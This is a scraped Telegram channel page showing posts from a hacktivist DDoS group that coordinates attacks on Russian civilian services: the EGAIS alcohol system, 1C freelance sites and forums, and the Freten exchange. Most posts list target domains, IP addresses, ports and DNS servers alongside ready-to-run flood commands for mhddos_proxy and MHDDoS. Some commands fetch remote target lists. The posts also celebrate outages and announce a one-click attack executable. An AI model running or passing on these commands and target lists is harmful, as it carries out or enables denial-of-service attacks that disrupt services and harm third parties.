cookie

Utilizamos cookies para mejorar tu experiencia de navegación. Al hacer clic en "Aceptar todo", aceptas el uso de cookies.

avatar

Гайдамаки InfoDDoS-4

Mostrar más
El país no está especificadoEl idioma no está especificadoLa categoría no está especificada
Advertising posts
286Suscriptores
Sin datos24 hours
Sin datos7 days
Sin datos30 days

Carga de datos en curso...

Tasa de crecimiento de suscriptores

Carga de datos en curso...

Доброго дня, Гайдамаки! Ми вирішили, що ці 4 канали не потрібні, тому через кілька днів їх буде видалено..😓 Причина проста: всі цілі і пости просто дублюються сюди, виникає питання — чому б вам не брати таргети на пряму з основного каналу? Ось і ми так подумали, тому всім активним учасникам прошу перейти на основний канал, лінк нижче: https://t.me/haydamaki Люблю, цілую — головний адмін❤️
Mostrar todo...
Гайдамаки

Discord Гайдамак:

https://discord.gg/UyqBRprgZt

Чат Гайдамак:

https://t.me/haydamaki_chat

Документація DDoS:

https://t.me/haydamaki/14

Зв'язок з адмінами: @haydamak_bot

Доброго дня, Гайдамаки, у нас зявились технічні негаразди, тому ціль не змінюється, поки що атаку продовжуємо на ЕГИАС. Нові цілі будуть завтра вранці, тому прошу зібратись максимальними силами, так як на 9 травня хочу зробити "подарунок" рашистам.
Mostrar todo...
Repost from Гайдамаки
Доброї ночі, Гайдамаки, цей пост буде більш розмовного характеру💡 Сьогодні ми продовжили атаку на ЕГАИС, але поки що можу сказати одне — їх сервери були довго вимкнені і взагалі відгороджені від інтернету, так сказати, "закрились на ремонт", тим часом закрились ще два заводи-пивоварні, так як продукція стоїть на складах, а вивезти її не можуть... Поки що я слідкую за ситуацією там і вже вранці точно зможу сказати, що атакуємо далі, думаю, що б такого цікавого підготувати рашистам на 9 травня😏 А зараз відпочивайте) Також, хочу сказати, що ми готуємо автоматичну програму для запуску кібератак на Windows (це для тих, хто боїться запускати консоль/термінал). Все, що вам буде потрібно зробити, — це запустити ".exe" файл. Все. Атака буде йти. Більш детальнішу інформацію ви отримаєте згодом, але сам факт полягає в тому, що атакувати зможуть навіть люди, які далекі від ІТ і не знають "шо куди жати і шо це за команди якісь на каналі". Навіть ваша бабуся запустить атаку😁 Для тих, хто з комп'ютером взаємодіє частіше — я закінчую працювати над інструкцією ддос "DDoS від А до Я", основний інструмент — це mhddos і його модифікації. Так як це найпотужніший інструмент на даний момент. ЗБІР о 12.00!
Mostrar todo...
Repost from Гайдамаки
Доброго дня, Гайдамаки і Гайдамачки!✨ З вечора і всю ніч ми мучили форум і фріланс біржу спеціалістів з 1С, але тепер настав час переключитись на іншу ціль. Думаю ви вже бачили новини, що в рашистів проблеми з Алкоголем через непрацюючу систему "ЕГАИС". Все просто — це постарались наші колеги по цеху, але вони не атакували DNS сервери. Тому сьогодні допоможемо їм в цьому ділі. egais.ru service.egais.ru check.egais.ru documents-utm.egais.ru 212.164.137.246 [443/TCP] cheques-utm.egais.ru 146.120.90.247 [443/TCP] queries-utm.egais.ru 146.120.90.245 [443/TCP] DNS сервери ЕГАИС: 91.217.20.20 91.217.21.20 89.104.93.31 193.232.146.1 [53/UDP] 194.67.73.79 [53/UDP, 111/UDP] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table (вище пріорітетна команда для атаки)** python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://egais.ru https://service.egais.ru https://check.egais.ru https://documents-utm.egais.ru https://cheques-utm.egais.ru https://queries-utm.egais.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 91.217.20.20:53 5000 10000 true
python3 start.py UDP 91.217.21.20:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 89.104.93.31:53 5000 10000 true
python3 start.py UDP 193.232.146.1:53 5000 10000 true
python3 start.py UDP 194.67.73.79:53 5000 10000 true
python3 start.py UDP 194.67.73.79:111 5000 10000 true
Нагадую, наша ціль зосередитись поки що саме на UDP таргетах, бажаю всім гарно провести час👌
Mostrar todo...
Repost from Гайдамаки
Доброго вечора, кібервоїни!⚔️ Ми атакували Фретен два дні підряд. Вони сховались за DDoS-Guard захистом. Пробити його нам вдалось, але тільки на кілька годин. Зараз сервіс функціонує нормально, але покошмарили ми їх знатно😈 Як не як, сервери не працювали, і потік грошей було тимчасово зупинено. Останнім часом всі угрупування ddos атакують сервіси 1С, зараз атаку локалізовано на "ЕГАИС". Для вирішення проблем на серверах 1С потрібні спеціалісти, що ж... так як наш вектор атаки це фріланс біржі, зокрема і бізнес сектор рашистів, ми атакуємо фріланс біржу саме спеціалістів для 1С. 1cl.su 1clancer.ru 213.108.130.76 [22/TCP, 80/TCP, 443/TCP-ssl, 3001/TCP] forum-1c.ru lancer.forum-1c.ru 176.113.82.119 —> форум [443/TCP-ssl] Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://1cl.su/ https://1clancer.ru/ https://lancer.forum-1c.ru/ https://forum-1c.ru/ -t 2100 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py STRESS https://1cl.su/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://1clancer.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://lancer.forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true
python3 start.py STRESS https://forum-1c.ru/ 6 1000 proxy.txt 10000 5000 true
DNS сервери висять на Яндекс клауді, а поштові захищені, тому їх не атакуємо. Ціль — сам сайт👍
Mostrar todo...
Гайдамаки і гайдамачки, хто з вас атакує, хто ні, а хто бере цілі з основного каналу? (потрібно вирахувати актив з цього каналу)Anonymous voting
  • Я атакую з основного каналу Гайдамак
  • Я не атакую
  • Я атакую, але з інших ддос-угрупувань
  • Я атакую з цього каналу і мені потрібен він
0 votes
Repost from Гайдамаки
Доброго вечора, Гайдамаки! Продовжуємо атакувати Фретен біржу. Сервіс працює, але з перебоями. Іноді буває, що ддос гуард вічно грузиться, але ніяк не прогрузиться, іноді сайт з'являється, але без CSS... Коротко кажучи, ми молодці, атаку не зупиняємо, результати дуже хороші😁 Також зараз не рекомендую ігнорувати тривоги, кацапи бушують...😓 І не розповсюджуйте інформацію "шо де в кого бахнуло", я звертаюся до всіх вас, так як ви перебуваєте в багатьох чатах, і навіювати паніку не потрібно.
Mostrar todo...
Repost from Гайдамаки
Доброго вечора, Гайдамаки! До цього моменту ми успішно атакували нашу ціль, але зараз кацапи сховались за DDoS-Guard захистом, також змінили поштовий айпі. Але не страшно, це нам не заважає бити їх далі, але вже методом DGB (буде дуже важко), а для пошти зміним айпі в таргетах. Все з українською любовю😘 Фретен, готуйтесь, буде жарко! Це вам за обстріляні наші міста, сьогодні🤬 (друзі, не ігноруйте тривоги) freten.ru robroy.ru mail.freten.ru mail.robroy.ru [ddos-guard] —> сайт* 82.202.172.70 [21/TCP, 22/TCP, 25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3, 1500/TCP] [53/UDP, 123/UDP] 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://robroy.ru -t 2200 --rpc 2000 -p 900 --http-methods DGB --table Команди для MHDDoS:
python3 start.py UDP 82.202.172.70:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 82.202.172.70:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py DGB https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py DGB https://robroy.ru 6 1000 proxy.txt 10000 5000 true Спробуємо пробити захист - нам потрібно, щоб сервіс лежав, сил багато для цього потрібно, бо бити такі барєри було завжди не легкою задачою, тим більше ми вперше атакуємо таким способом.
Mostrar todo...
Repost from Гайдамаки
Без коментарів.... Перша біржа вже лежить, тримаємо в такому прекрасному стані її далі, потім атака на іншу😉👌
Mostrar todo...
Знову всіх вітаю, сподіваюсь, ви готові?😏 Атакуємо російську фріланс біржу Фретен — не найпопулярніший сервіс, але через нього теж багато людей працюють, і потік грошей там великий. Такі сервіси, зазвичай, платять налоги в держ. казну РФ, а значить фінансово підтримують ворога. Думаю більше розповідати тут нічого. ЧАВИМО РАШИСТІВ🤬 freten.ru robroy.ru 37.46.131.229 [21/TCP, 22/TCP, 443/TCP, 1500/TCP] —> сайт* [53/UDP, 123/UDP] mail.freten.ru mail.robroy.ru 37.46.131.229 [25/smtp, 110/pop3, 143/imap, 465/ssl/smtp, 587/smtp, 993/ssl/imap, 995/ssl/pop3] —> пошта* 82.146.43.2 94.250.248.160 [53/UDP] —> DNS-servers* Команда для Docker: docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table docker run -it --rm --pull always ghcr.io/porthole-ascend-cinnamon/mhddos_proxy:latest https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команда для mhddos_proxy: python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_tcp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py -c http://goals.ddosukraine.com.ua/haydamaky/targets_udp.txt -t 1000 -p 4000 --rpc 2000 --table python runner.py https://freten.ru https://mail.freten.ru https://robroy.ru https://mail.robroy.ru -t 2000 --rpc 2000 -p 900 --http-methods STRESS POST --table Команди для MHDDoS:
python3 start.py UDP 37.46.131.229:53 5000 10000 true
python3 start.py UDP 94.250.248.160:53 5000 10000 true
python3 start.py UDP 82.146.43.2:53 5000 10000 true

python3 start.py UDP 37.46.131.229:123 5000 10000 true
(тут синхронізація часу(123 порт), тому не пріорітетна команда)* python3 start.py STRESS https://freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py STRESS https://robroy.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.freten.ru 6 1000 proxy.txt 10000 5000 true python3 start.py POST https://mail.robroy.ru 6 1000 proxy.txt 10000 5000 true
Mostrar todo...